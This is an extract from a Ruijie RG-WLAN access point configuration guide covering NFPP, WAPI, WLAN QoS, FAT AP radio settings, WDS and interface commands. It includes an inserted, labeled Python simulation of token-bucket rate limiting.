  • Page 154 Configuration Guide Configuring NFPP  Support the global configuration mode on the AP device. Command log-buffer entries number Parameter number: Indicates the buffer size in unit of the number of logs, ranging from 0 to 1024. Description Defaults The default buffer size is 256. Command NFPP configuration mode Mode...
  • Page 155  Configure VLAN-based log filtering. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#log-buffer entries 1024 Ruijie (config-nfpp)#log-buffer logs 3 interval 5 Ruijie (config-nfpp)#logging interface vlan 1  Verification Run the show nfpp logsummary command to display the configurations. Total log buffer size : 1024...
  • Page 156 Configuration Guide Configuring NFPP 4.5 Monitoring Clearing Command Description clear nfpp arp-guard scan Clears the ARP guard scanning table. clear nfpp arp-guard hosts Clears monitored hosts in ARP guard. clear nfpp ip-guard hosts Clears monitored hosts in IP guard. clear nfpp icmp-guard hosts Clears monitored hosts in ICMP guard.
  • Page 157 Configuration Guide Configuring NFPP show nfpp dhcp-guard trusted-host Displays trusted hosts in DHCP guard. show nfpp dhcpv6-guard summary Displays configuration parameters of DHCPv6 guard. show nfpp dhcpv6-guard hosts Displays monitored hosts in DHCPv6 guard. show nfpp dhcpv6-guard trusted-host Displays trusted hosts in DHCPv6 guard.
  • Page 158 Configuration Guide Configuring WAPI 5 Configuring WAPI 5.1 Overview WLAN Authentication and Privacy Infrastructure (WAPI) is a wireless network security standard for which China has the proprietary intellectual property rights. WAPI comprises two parts:  WLAN Authentication Infrastructure (WAI): a security solution used for identification and key management in a WLAN. WAPI provides two authentication approaches: WAPI pre-shared key authentication and WAPI certificate authentication.
  • Page 159 Configuration Guide Configuring WAPI  Authentication Server (AS): The AS provides the WAPI certificate authentication service.  Authentication Service Unit (ASU): An entity that provides mutual authentication service for the AE and ASUE. This entity resides in the AS.  Authentication Supplicant Entity (ASUE): An entity that requests authentication before accessing a service. This entity resides in the STA.
  • Page 160 Configuration Guide Configuring WAPI authentication mode. If the certificate issuing system and certificate authentication system are the same entity, this mode is called WAPI two-certificate authentication mode.  Pre-shared Key Authentication Pre-shared key authentication refers to authentication based on the keys of an STA and an AE. Before authentication, the STA and AE must be configured with the same key, namely, a pre-shared key.
  • Page 161 Configuration Guide Configuring WAPI 5.4 Configuration Configuration Description and Command (Mandatory) It is used to enable the WAPI certificate authentication approach. security wapi Configures and enables the WAPI security mode. security wapi ae cert Configures the WAPI certificate of the AE equipment. security wapi asu address Configures the IP address of the authentication server. security wapi ca cert...
  • Page 162 Configuration Guide Configuring WAPI Configuration Steps  Enabling the WAPI Security Mode  Mandatory.  It is configured in the WLAN security configuration mode on the AP. Command security wapi { enable | disable } Parameter enable: Enables the WAPI security mode. Description disable: Disables the WAPI security mode.
  • Page 163 Configuration Guide Configuring WAPI same time. After the WAPI three-certificate authentication mode is configured, the STA accesses the WLAN by using the three-certificate authentication mode. Command security wapi 3-cert { enable | disable } Parameter enable: Enables the WAPI three-certificate authentication. Description disable: Disables the WAPI three-certificate authentication.
  • Page 164 Configuration Guide Configuring WAPI Command security wapi asu cert asu_certfile asu_certfile: Specifies the ASU certificate file name. Parameter Description Defaults Command WLAN security configuration mode Mode Usage Guide Before configuring the ASU certificate, enable the WAPI security mode. Before configuration, ensure that the certificate file is imported into the AE and ASUE. The ASU certificate must be configured for the three-certificate authentication mode.
  • Page 165 Configuration Guide Configuring WAPI Notes  After the WAPI pre-shared key authentication mode is enabled, a pre-shared key must be configured. Configuring the WAPI security mode and displaying the WAPI configuration and state are not supported on the AP110-W or AP120-W. Configuration Steps ...
  • Page 166 Configuration Guide Configuring WAPI Parameter ascii: Specifies that the pre-shared key is in the ASCII format. Description ascii-key: Specifies a key consisting of 8-32 ASCII characters. hex: Specifies that the pre-shared key is in the hexadecimal format. hex-key: Specifies a key consisting of 16-64 hexadecimal characters. The length must be an even number. Defaults Command WLAN security configuration mode...
  • Page 167 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN QoS Configuration 1 Configuring WLAN QoS...
  • Page 168 Configuration Guide Configuring WQoS 1 Configuring WQoS 1.1 Overview WLAN QoS (WQoS) is a wireless bandwidth control technology. It involves rate limiting and fair scheduling. Rate limiting is used to limit the traffic of access points (APs), WLAN, or STAs, thus preventing the traffic from exceeding a specified range.
  • Page 169 (Rate Limiting) Configuration Guide Configuring WQoS Fair scheduling allows STAs in the same frequency band of the same AP to share the wireless network resources provided by the AP fairly. The fair scheduling function can prevent low-speed STAs from decreasing the throughput of the entire wireless network, and provide smoother network experience for STAs.
  • Page 170 Configuration Guide Configuring WQoS In real wireless scenarios, STAs often differ in type and performance. Consequently, some STAs can never obtain resources, or get very slow responses. Worse still, these STAs cannot access the network at all, which seriously affects user experience.
  • Page 171 Configuration Guide Configuring WQoS  Mandatory.  On a fat AP, run the wlan-qos ap-based command in global configuration mode to configure AP-based rate limiting. Command wlan qos ap-based { per-user-limit | total-user-limit } { down-streams | up-streams } average-data-rate average-data-rate burst-data-rate burst-data-rate wlan-qos ap-based total-user-limit { down-streams | up-streams } intelligent Parameter...
  • Page 172 Configuration Guide Configuring WQoS wlan-qos wlan-based { wlan-id | ssid } total-user-limit { down-streams | up-streams } intelligent Parameter per-user-limit: Indicates that rate limiting is implemented on every STA on the WLAN. Description total-user-limit: Indicates that rate limiting is implemented on all STAs on the WLAN. intelligent: Indicates whether rate limiting is implemented on all STAs on the WLAN intelligently.
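The average-data-rate / burst-data-rate pair and the per-user-limit / total-user-limit choice described on pages 168 to 172 can be modelled as a token bucket. The Python below is an added illustration and is not Ruijie code or the RGOS implementation (the manual does not state how the limits are enforced): the token-bucket algorithm, the byte-based units, the two MAC addresses and the traffic pattern are all assumptions of the example. It pushes the same two-STA traffic through both modes and reports how many frames each STA gets through.

```python
"""Token-bucket model of WQoS rate limiting with an average rate and a burst.

Added illustration, not Ruijie code: the manual names the parameters
(average-data-rate, burst-data-rate, per-user-limit, total-user-limit) but not
the enforcement algorithm; a token bucket is assumed here. Units (bytes and
bytes per second), the MAC addresses and the traffic are constructed.
"""
from typing import Dict, List, Tuple


class TokenBucket:
    """Bucket holding at most `burst` bytes, refilled at `rate` bytes per second.

    Time is kept in integer milliseconds so the arithmetic is exact.
    """

    def __init__(self, rate_bps: int, burst_bytes: int, now_ms: int) -> None:
        self.rate = rate_bps
        self.burst = burst_bytes
        self.tokens = burst_bytes      # a new flow may start with a full burst
        self.last_ms = now_ms

    def allow(self, size: int, now_ms: int) -> bool:
        """Admit a frame of `size` bytes arriving at `now_ms`, or drop it."""
        elapsed = max(0, now_ms - self.last_ms)
        self.tokens = min(self.burst, self.tokens + elapsed * self.rate // 1000)
        self.last_ms = now_ms
        if size <= self.tokens:
            self.tokens -= size
            return True
        return False


class WlanRateLimiter:
    """per-user-limit: one bucket per STA; total-user-limit: one bucket shared by all STAs."""

    def __init__(self, mode: str, rate_bps: int, burst_bytes: int) -> None:
        if mode not in ("per-user-limit", "total-user-limit"):
            raise ValueError(f"unknown mode {mode!r}")
        self.mode = mode
        self.rate = rate_bps
        self.burst = burst_bytes
        self._buckets: Dict[str, TokenBucket] = {}

    def admit(self, sta_mac: str, size: int, now_ms: int) -> bool:
        key = sta_mac if self.mode == "per-user-limit" else "<wlan>"
        bucket = self._buckets.get(key)
        if bucket is None:
            bucket = self._buckets[key] = TokenBucket(self.rate, self.burst, now_ms)
        return bucket.allow(size, now_ms)


STA_A = "0011.2233.0001"   # constructed MAC addresses
STA_B = "0011.2233.0002"


def constructed_traffic() -> List[Tuple[int, str, int]]:
    """Two STAs each send a 1500-byte frame every 10 ms for one second
    (150,000 bytes/s each), A always just before B at the same instant."""
    frames = []
    for step in range(100):
        t_ms = step * 10
        frames.append((t_ms, STA_A, 1500))
        frames.append((t_ms, STA_B, 1500))
    return frames


def simulate(mode: str, rate_bps: int = 100_000, burst_bytes: int = 20_000) -> Dict[str, int]:
    """Return the number of frames admitted per STA under the given mode."""
    limiter = WlanRateLimiter(mode, rate_bps, burst_bytes)
    admitted: Dict[str, int] = {}
    for now_ms, mac, size in constructed_traffic():
        admitted.setdefault(mac, 0)
        if limiter.admit(mac, size, now_ms):
            admitted[mac] += 1
    return admitted


if __name__ == "__main__":
    for mode in ("per-user-limit", "total-user-limit"):
        print(mode, simulate(mode))
```

With both STAs offering 150,000 bytes/s against a 100,000 bytes/s average and a 20,000-byte burst, per-user-limit admits 79 frames from each STA, whereas total-user-limit admits 79 frames in total; because STA A's frame is processed first at every instant, STA B only gets the 9 frames that fit in the initial burst. A shared limit therefore bounds the WLAN's aggregate traffic but says nothing about how that bandwidth is divided among the STAs.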
  • Page 173 Configuration Guide Configuring WQoS Mode Usage Guide • Configuring the Fair Scheduling Priority • (Optional) Perform this configuration if you need to change the fair scheduling priority of a STA. • On a fat AP, run the sta-fair command in global configuration mode to configure the fair scheduling priority. Command sta-fair mac-address priority priority mac-address: Indicates the MAC address of a STA.
  • Page 175 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN Networking Configuration 1 Configuring Fat APs 2 Configuring WDS...
  • Page 176 Configuration Guide Configuring FAT APs 1 Configuring FAT APs 1.1 Overview An Access Point (AP) is wireless equipment used to control and manage wireless clients. When frames are transmitted between wireless clients and a LAN, wireless-to-wired and wired-to-wireless transitions are implemented, during which an AP plays the role of a bridge.
  • Page 177 Configuration Guide Configuring FAT APs • Client1 and Client2 can access each other and access hosts in the network. Figure 1-1 Radio1 is the first RF interface of the FAT AP. Remarks Client1 and Client2 are wireless clients. The FAT AP, Client1 and Client2 comprise BSS1 and BSS1 belongs to ESS1. Deployment •...
  • Page 178 Configuration Guide Configuring FAT APs Figure 1-2 Radio1 is the first RF interface of the FAT AP. Client1 and Client2 are wireless clients. Remarks The FAT AP and Client1 comprise BSS1 and BSS1 belongs to ESS1. The FAT AP and Client2 comprise BSS2 and BSS2 belongs to ESS2. Deployment •...
  • Page 179 Configuration Guide Configuring FAT APs Radio1 is the first RF interface of the FAT AP. Radio2 is the second RF interface of the FAT AP. Remarks Client1 and Client2 are wireless clients. The FAT AP and Client1 comprise BSS1 and BSS1 belongs to ESS1. The FAT AP and Client2 comprise BSS2 and BSS2 belongs to ESS1.
  • Page 180 Configuration Guide Configuring FAT APs Access Category (AC): An AC is the label of a universal EDCA parameter set. Different ACs have different priorities for accessing the medium because their EDCA parameters differ. • Access Point (AP): An AP is used by wireless terminals to access a wired network and acts as the communication bridge between the wireless terminals and the wired network.
  • Page 181 Configuration Guide Configuring FAT APs Working Principle • Planning WLAN Subnets In a wireless network, users can divide the network into multiple WLAN subnets by creating WLANs and specify the functions and attributes of the WLANs in the WLAN configuration mode, thus providing different network services for wireless users. •...
  • Page 182 Configuration Guide Configuring FAT APs • Configuring the DTIM Period Delivery Traffic Indication Map (DTIM) is a flag bit in a beacon frame, which indicates the interval at which an AP sends broadcast frames or multicast frames. When a wireless terminal is in the sleep mode, the AP automatically caches the data received within the DTIM interval.
  • Page 183 Configuration Guide Configuring FAT APs This standard operates both at 2.4 GHz and 5 GHz bands, and provides the highest data transmission rate of 600 Mbit/s. Devices supporting 802.11n are backward-compatible with 802.11a/b/g. • The RF rate of 802.11n is configured through the index of Modulation and Coding Scheme (MCS). The MCS table is a representation form in which 802.11n expresses the communication rate of a WLAN.
  • Page 184 Configuration Guide Configuring FAT APs • RTS/CTS To avoid signal conflict that causes data transmission failure, the IEEE 802.11 MAC protocol provides the Request To Send/Clear To Send (RTS/CTS) handshake protocol. Assuming that STA A needs to send data to STA B, STA A first sends an RTS frame to STA B.
  • Page 185 Configuration Guide Configuring FAT APs A country code is used to identify a country where radio frequencies reside. The bands, channels, and power vary with country codes. Before configuring an AP, it is required to specify the country code supported by this AP. If the configured country code changes, the corresponding bands, channels and power also change.
  • Page 186 Configuration Guide Configuring FAT APs • STBC Space Time Block Coding (STBC) is a coding technique in wireless communication that improves data transmission reliability by using time and space diversities when multiple duplicates of data are transmitted at different moments and through different antennas.
  • Page 187 Configuration Guide Configuring FAT APs Working Principle  autowifi Configuration on an AP: (1) VLAN planning: VLAN 10 is used as the VLAN for STAs on the AP. (2) Address pool: The 192.168.110.0 segment is used as the STA address pool on a FAT AP. The IP address of bvi 1 is 192.168.110.1.
  • Page 188 Configuration Guide Configuring FAT APs rate-set 11b Configures the 11b rate set. rate-set 11g Configures the 11g rate set. rate-set 11n Configures the 11n rate set. rate-set 11ac Configures the 11ac rate set. Configures the multicast rate. mcast-rate power local Configures the transmit power.
  • Page 189 Configuration Guide Configuring FAT APs (Optional) It is used to set e-bag parameters. Configures the number of AMPDU software ampdu-retries re-transmission times. Configures whether to enable the RTS ampdu-rts protection for AMPDU aggregation packets. Configuring E-bag Configures the number of Ethernet packets Parameters eth-schd that can be received by an AP at a time.
  • Page 190 Configuration Guide Configuring FAT APs Usage Guide • Configuring an SSID • For a FAT-AP to provide WLAN service, you must configure an SSID. Run the ssid command to configure the SSID of a specified WLAN. • If there are no special requirements, you can perform this configuration in the WLAN global configuration mode of the AP equipment.
  • Page 191 Configure the SSID of WLAN 1 to fat_ap on the AP. • Enable broadcasting of the SSID of WLAN 1 on the AP. • Configure the multicast rate of WLAN 1 to 6 Mbit/s on the AP. FAT AP Ruijie#config Ruijie(config)#dot11 wlan 1 Ruijie(dot11-wlan-config)#ssid fat_ap Ruijie(dot11-wlan-config)#broadcast-ssid Ruijie(dot11-wlan-config)#mcast-rate 6...
  • Page 192 Configuring FAT APs Verification After the user configures a WLAN, verify the WLAN based on displayed WLAN configurations.  Run the show running-config command to verify the configurations of a WLAN. Ruijie#show running-config dot11 wlan 1 mcast-rate 6 broadcast-ssid ssid fat_ap Common Errors 1.4.2 Configuring a dot11radio Subinterface...
  • Page 193 Configuration Guide Configuring FAT APs • For a FAT-AP to forward data normally, you must configure the VLAN attributes encapsulated by the dot11radio subinterface. Otherwise, STAs may not communicate normally even though they can access the VLAN. Run the encapsulation dot1Q command to configure the VLAN attributes of the specified dot11radio subinterface. •...
  • Page 194 Configure the VLAN ID encapsulated by dot11radio 1/0.1 to 1 on the AP equipment. • Map WLAN 1 to dot11radio 1/0.1 on the AP equipment. FAT AP Ruijie#config Ruijie(config)#interface dot11radio 1/0.1 Ruijie(config-subif)#encapsulation dot1Q 1 Ruijie(config-subif)#wlan-id 1 Verification After configuring the dot11radio subinterface, you can verify the dot11radio subinterface based on displayed dot11radio subinterface configurations.
  • Page 195 Configuration Guide Configuring FAT APs Notes • FAT APs support this configuration. Configuration Steps • Configuring the DTIM Period • (Optional) Run the beacon dtim-period command to configure the DTIM period. The value ranges from 1 to 255. • If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment.
  • Page 196 Configuration Guide Configuring FAT APs Command ampdu { enable | disable } Parameter enable: enables the A-MPDU aggregation mode. Description disable: disables the A-MPDU aggregation mode. Defaults The A-MPDU aggregation mode is enabled. Command dot11radio interface configuration mode Mode Usage Guide •...
  • Page 197 Configuration Guide Configuring FAT APs • If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment. • Disabling a rate makes that rate unavailable. Disabling all rates prevents 11g STAs from accessing the network. Command rate-set 11g { mandatory | support | disable speed } Parameter...
  • Page 198 Configuration Guide Configuring FAT APs Usage Guide • Configure the Multicast Rate • Optional. • If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment. • A higher multicast rate transmits multicast packets faster, occupies the channel for a shorter time and uses the channel more efficiently, but lowers the transmit success ratio when channel quality is poor.
  • Page 199 Configuration Guide Configuring FAT APs Command sta-limit client-num Parameter client-num: indicates the STA quantity, ranging from 1 to 128. Description Defaults The STA quantity based on an RF interface is limited to 32. Command dot11radio interface configuration mode Mode Usage Guide •...
  • Page 200 Configuration Guide Configuring FAT APs • If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment. • If 11g is supported, 11g STAs can access the AP; otherwise, 11g STAs cannot access it. Command 11gsupport enable no 11gsupport enable...
  • Page 201 Configuration Guide Configuring FAT APs • Configuring the Minimum Value of RSSI for STA Access • Optional. • If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment. •...
  • Page 202 Configuration Guide Configuring FAT APs Description Defaults The transmit power for management frames is 0, which indicates that no transmit power is configured for management frames. Command dot11radio interface configuration mode Mode Usage Guide • Configuring the STA Idle Time •...
  • Page 203 Configuration Guide Configuring FAT APs • If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment. • Packets from upper layers or some large management frames must be fragmented before they can be transmitted on wireless channels.
  • Page 204 Configuration Guide Configuring FAT APs Parameter milliseconds: indicates the beacon frame period, ranging from 20 to 1000 in the unit of ms. Description Defaults The beacon frame period is 100 milliseconds. Command dot11radio interface configuration mode Mode Usage Guide • Enabling or Disabling the Short Preamble •...
  • Page 205 Configuration Guide Configuring FAT APs  The higher the channel bandwidth, the more channel bandwidth available to STAs, but the fewer the channels that can be configured, and the higher the probability of interference between neighboring channels. Command chan-width { 20 | 40 | 80 } Parameter 20: sets the channel bandwidth to 20 MHz.
  • Page 206 Configuration Guide Configuring FAT APs Mode Usage Guide • Configuring the Country Code • Optional. • If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment. • A country code is used to identify a country where radio frequencies reside. The bands, channels, and power vary with country codes.
  • Page 207 Configuration Guide Configuring FAT APs • An AP can use a different number of antennas for data transmission. This allows the AP to transmit in two-spatial-stream or three-spatial-stream mode over 802.11n, thus improving its data transmission performance.
  • Page 208 Configuration Guide Configuring FAT APs Usage Guide Not all APs support this configuration. It needs to be performed only when the longest distance between the AP and its wireless transmission peer is greater than 1000 m. The configured distance may be longer than the actual distance, but must not be shorter.
  • Page 209 Ruijie#config Ruijie(config)#interface Dot11radio 1/0 Ruijie(config-if-Dot11radio 1/0)#beacon dtim-period 3 Ruijie(config-if-Dot11radio 1/0)#apsd enable Ruijie(config-if-Dot11radio 1/0)#ampdu enable Ruijie(config-if-Dot11radio 1/0)#rate-set 11a mandatory 24 Ruijie(config-if-Dot11radio 1/0)#rate-set 11a support 54 Ruijie(config-if-Dot11radio 1/0)#rate-set 11b disable 1 Ruijie(config-if-Dot11radio 1/0)#rate-set 11b disable 2 Ruijie(config-if-Dot11radio 1/0)#rate-set 11g disable 1 Ruijie(config-if-Dot11radio 1/0)#rate-set 11g disable 2...
  • Page 210 After the user configures RF parameters, verify the dot11radio interface based on displayed dot11radio interface configurations. • Run the show running-config command to check the configurations of the dot11radio interface. Ruijie#show running-config interface Dot11radio 1/0 ip proxy-arp rate-set 11b mandatory 5 11...
  • Page 211 Configuration Guide Configuring FAT APs 1.4.4 Configuring E-bag Parameters Configuration Effect • Configure the e-bag parameters of an AP and associated RF interfaces to facilitate configuration and management by an administrator. Notes • Configuration Steps • Configuring the Number of AMPDU Software Re-transmission Times •...
  • Page 212 Configuration Guide Configuring FAT APs • Configuring the Number of Ethernet Packets That Can Be Received by an AP at a Time. • (Optional) The default value varies with APs. • If there are no special requirements, you can perform this configuration in the global configuration mode of the AP equipment.
  • Page 213 Configuration Guide Configuring FAT APs Description Command dot11radio interface configuration mode Mode Usage Guide • Configuring E-bag Network Optimization by Using the One-Key Mode • (Optional) There is no default configuration. • If there are no special requirements, you can perform this configuration in the global configuration mode of the AP equipment.
  • Page 214 Configuration • Configure e-bag parameters on the AP as follows: Steps FAT AP Ruijie# configure terminal Ruijie(config)# eth-schd 100 Ruijie(config)# interface dot11radio 1/0 Ruijie(config-if-Dot11radio 1/0)# ampdu-retries 3 Ruijie(config-if-Dot11radio 1/0)# ampdu-rts Ruijie(config-if-Dot11radio 1/0)# no ldpc Ruijie(config-if-Dot11radio 1/0)# no stbc Verification •...
  • Page 216 Configuration • Configure e-bag parameters on an AP: Steps FAT AP Ruijie# configure terminal Ruijie(config)# ebag Verification • Run the show running-config command to check the e-bag parameter settings on a specified AP. Ruijie(config)# show running-config...
  • Page 217 Configuration Guide Configuring FAT APs • Enable the link integrity check function. Notes • Configuration Steps • Enabling the Link Integrity Check Function • (Mandatory) Run the link-check enable command to enable the link integrity check function. Command link-check enable Parameter Description Command...
  • Page 218 Configuration Guide Configuring FAT APs FAT AP Ruijie# configure terminal Ruijie(config)# link-check enable Verification • Run the show running-config command to check the configuration. Ruijie(config)# show running-config …… link-check enable …… Common Errors • 1.4.6 Configuring a WLAN by Using the One-Key Mode Configuration Effect •...
  • Page 219 FAT AP If one-key WLAN configuration needs to be performed on the AP equipment in a FAT AP environment, then: Configuration • Commands to perform one-key WLAN configuration on the AP equipment: Steps Ruijie# configure terminal FAT AP Ruijie(config)# autowifi Verification • Run the show running-config command to check the one-key WLAN configuration.
  • Page 220 FAT AP If one-key WLAN configuration needs to be performed on the AP equipment in a FAT AP environment, then: Configuration • Commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification • Run the show running-config command to check the one-key WLAN configuration. dns-server 8.8.8.8 default-router 192.168.110.1...
  • Page 221 Configuration • Commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification • Run the show running-config command to check the one-key WLAN configuration. interface GigabitEthernet 0/1 encapsulation dot1Q 1...
  • Page 222 Configuration • Commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification • Run the show running-config command to check the one-key WLAN configuration. station-role root-ap interface Dot11radio 2/0...
  • Page 223 Configuration • Commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification • Run the show running-config command to check the one-key WLAN configuration. interface BVI 1 ip address 192.168.110.1 255.255.255.0...
  • Page 224 FAT AP If one-key WLAN configuration needs to be performed on the AP equipment in a FAT AP environment, then: Configuration • Commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification • Run the show running-config command to check the one-key WLAN configuration. 1.5 Monitoring Displaying...
  • Page 225 Configuration Guide Configuring FAT APs show dot11 rate-set: Displays the rate sets of all RF interfaces. show dot11 wlan wlan-id: Displays the radio information configurations of a WLAN. show dot11 channels active interface-name: Displays the working channel supported by a WNIC. show dot11 channels all interface-name: Displays all working channels supported by a WNIC.
  • Page 226 Configuration Guide Configuring WDS 2 Configuring WDS 2.1 Overview Wireless Distribution System (WDS) is a system enabling interconnection of multiple access points (APs) in wireless bridging or relay mode to interconnect distributed networks and spread wireless signals. WDS has two working modes: Root Bridge and Non-root Bridge. •...
  • Page 227 Configuration Guide Configuring WDS 2.3.1 Establishing WDS Bridging Establish WDS bridging. Working Principle Each AP is a Basic Service Set (BSS). Each has a BSSID (which is usually the MAC address of an AP). An AP regularly broadcasts Beacon frames with the SSID (name of the WLAN) and BSSID, and wireless stations (STAs) listen to the Beacon frames by scanning.
  • Page 228 Configuration Guide Configuring WDS three-address format is changed to a four-address format, with the MAC addresses of AP 2, AP 1, STA 3 and STA 1 filled (see Figure 2-2). After receiving the frame, AP 1 forwards it to STA 3 and changes the four-address format back to a three-address format.
  • Page 229 Configuration Guide Configuring WDS 2.4.1 Configuring WDS Basic Functions Configuration Effect • Configure WDS bridging. Notes • In WDS application environments, the Multiple Spanning Tree Protocol (MSTP) function must be enabled to prevent potential network loops. • Meanwhile, the Address Resolution Protocol (ARP) agent must be disabled. •...
  • Page 230 Configuration Guide Configuring WDS Parameter Description Defaults APs are not working in the bridging mode. Command Interface configuration mode Mode Usage Guide • Specifying a Root Bridge for a Non-root Bridge • Mandatory. • Configure bridge coverage on APs for fat APs. •...
  • Page 231 Configuration Guide Configuring WDS It is recommended to disable bridge coverage. Usage Guide • Pre-configuring a Fit Non-root Bridge • Optional. • When a non-root bridge needs to work in fit AP mode, the pre-configuration must be conducted on fat APs. •...
  • Page 232 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 Access Service Configuration 1. Configuring Interface 2. Configuring MAC Address 3. Configuring VLAN 4. Configuring VLAN Group 5. Configuring LLDP 6. Configuring PPPoE Client...
  • Page 233 1 Configuring Interfaces 1.1 Overview Interfaces are important parts for data exchange on network devices. Ruijie Networks devices support two types of interfaces: physical interfaces and logical interfaces. A physical interface is a real entity that exists on a device, for example, a FastEthernet (FE) or GigabitEthernet (GE) interface.
  • Page 234 Run ping 192.168.2.2 and ping 192.168.1.1 respectively on Router A and Router C to achieve route-based communication on Router B. 1.3 Features Basic Concepts • Interface Types Interfaces on Ruijie Networks AP devices are classified into two categories: • Local Area Network (LAN) interface • Logical interface Common LAN interfaces fall into the following types: •...
  • Page 235 Configuration Guide Configuring Interfaces requests, or the network interface ID for remote Telnet access. The procedure of configuring a loopback interface is similar to that of configuring an Ethernet interface. You can regard a loopback interface as a virtual Ethernet interface. •...
  • Page 236 Configuration Guide Configuring Interfaces Feature Description Specifying the Medium Type If an interface is a Small Form-factor Pluggable (SFP) combo interface, you can choose to use the optical interface or the copper port based on your needs. Enabling Module If interface rate auto-negotiation is enabled, the interface rate can be automatically adjusted Auto-Detection based on the type of the inserted module.
  • Page 237 Configuration Guide Configuring Interfaces The types of interfaces of all ranges specified in one command must be the same. Pay attention to the format of the range parameter when you run the interface range command. The following common interface range formats are valid: •...
  • Page 238 Configuration Guide Configuring Interfaces • Configuring a Tunnel Interface No tunnel interface is created by default. You can run the interface tunnel tunnel-number command in global configuration mode to create a tunnel interface. The value of tunnel-number ranges from 1 to the maximum number of tunnel interfaces supported by a device. After a tunnel interface is successfully created, enter the interface configuration mode of this tunnel interface.
  • Page 239 Configuration Guide Configuring Interfaces Working Principle When exchanging a great throughput of data, an interface may receive jumbo frames whose size is larger than that of typical Ethernet frames. MTU is the size of a valid data segment of a frame. It does not include the overhead of Ethernet encapsulation.
  • Page 240 You can run the bandwidth kilobits command in interface configuration mode to set the interface bandwidth. kilobits indicates the bandwidth per second, in the unit of Kbps. It ranges from 1 to the maximum Ethernet rate supported by Ruijie devices. For 40GE physical interfaces with the maximum rate capability, the maximum bandwidth is 40,000,000. You can run the no bandwidth command to restore the default value.
  • Page 241 Configuration Guide Configuring Interfaces 1.3.8 Configuring the Carrier Delay Working Principle The carrier delay refers to the acceptable time delay in status change of the Data Carrier Detect (DCD) signal from Down to Up or from Up to Down. If the DCD status changes within the delay, the system will ignore this change and the upper data link layer does not need to renegotiate.
  • Page 242 Configuration Guide Configuring Interfaces Related Configuration • Configuring the 802.1Q VLAN Tag By default, the 802.1Q encapsulation protocol is disabled for interfaces. You can run the encapsulation dot1Q VlanID command in interface configuration mode to encapsulate 802.1Q on an interface. VlanID is the VLAN ID to be encapsulated. 1.3.10 Configuring the Rate and Duplex Mode You can configure the rate and duplex mode of an Ethernet interface and AP.
  • Page 243 Configuration Guide Configuring Interfaces 1.3.11 Enabling Module Auto-Detection If an interface works in auto-negotiation mode, the interface rate can be automatically adjusted based on the detected type of the inserted module. Working Principle Currently, two types of modules are supported: SFP (Gigabit) and SFP+ (10 Gigabit). If an SFP module is inserted, the interface works in Gigabit mode.
  • Page 244 Configuration Guide Configuring Interfaces Configuration Description and Command Attributes Configures the interface bandwidth in interface bandwidth configuration mode. Configures the carrier delay of an interface in carrier-delay interface configuration mode. Configures the load calculation interval of an load-interval interface in interface configuration mode. Configures the duplex mode of an interface.
  • Page 245 Configuration Guide Configuring Interfaces • (Optional) To configure this function, run the interface range command. • Run this command in global configuration mode. • To create non-existing logical interfaces in batches or configure multiple existing physical or logical interfaces in interface configuration mode, run this command.
  • Page 246 Configuration Guide Configuring Interfaces • Configuring Interfaces Within a Specific Range • If you can properly enter the interface configuration mode after running the interface range command, the configuration is successful. • After running the no interface range command on a logical interface, you can also run the show running command to check whether the interface exists.
  • Page 247 Configuration Guide Configuring Interfaces • Run the no form of this command to delete a specified logical interface. • Run the default form of this command to restore the default configurations in interface configuration mode. • Configuring Interfaces Within a Specific Range Command interface range { port-range | macro macro_name } Parameter...
  • Page 248 Configuration Guide Configuring Interfaces • Configuring the Interface Description Command description string Parameter string: Indicates the interface description. Description Command Interface configuration mode Mode Run this command to enter the interface configuration mode and then modify the interface configurations. Usage Guide •...
  • Page 249 Configuration Guide Configuring Interfaces A(config-if-GigabitEthernet 0/1)# snmp trap link-status A(config-if-GigabitEthernet 0/1)# shutdown A(config-if-GigabitEthernet 0/1)# end A# write B# configure terminal B(config)# snmp-server if-index persist B(config)# interface gigabitethernet 0/1 B(config-if-GigabitEthernet 0/1)# ip address 192.168.1.2 255.255.255.0 B(config-if-GigabitEthernet 0/1)# snmp trap link-status B(config-if-GigabitEthernet 0/1)# shutdown B(config-if-GigabitEthernet 0/1)# end B# write Perform the following operations on Router A and Router B respectively:...
  • Page 250 Configuration Guide Configuring Interfaces Rxload is 1/255, Txload is 1/255 Ethernet attributes: Medium-type is Copper Last link state change time: 2013-12-20 13:55:20 Time duration since last link state change: 5 days, 5 hours, 17 minutes, 36 seconds Priority is 0 admin duplex mode is AUTO, oper duplex is Unknown admin speed is AUTO, oper speed is Unknown Rxload is 1/255, Txload is 1/255...
  • Page 251 Configuration Guide Configuring Interfaces Medium-type is Copper Last link state change time: 2013-12-20 13:55:20 Time duration since last link state change: 5 days, 5 hours, 17 minutes, 36 seconds Priority is 0 admin duplex mode is AUTO, oper duplex is Unknown admin speed is AUTO, oper speed is Unknown Rxload is 1/255, Txload is 1/255 10 seconds input rate 0 bits/sec, 0 packets/sec...
  • Page 252 Configuration Guide Configuring Interfaces • Configuring the MTU • (Optional) If this function is required, run the mtu command in interface configuration mode. • Generally, the default MTU of an interface is 1,500 bytes. • Configuring the Bandwidth • (Optional) If this function is required, run the bandwidth command in interface configuration mode. •...
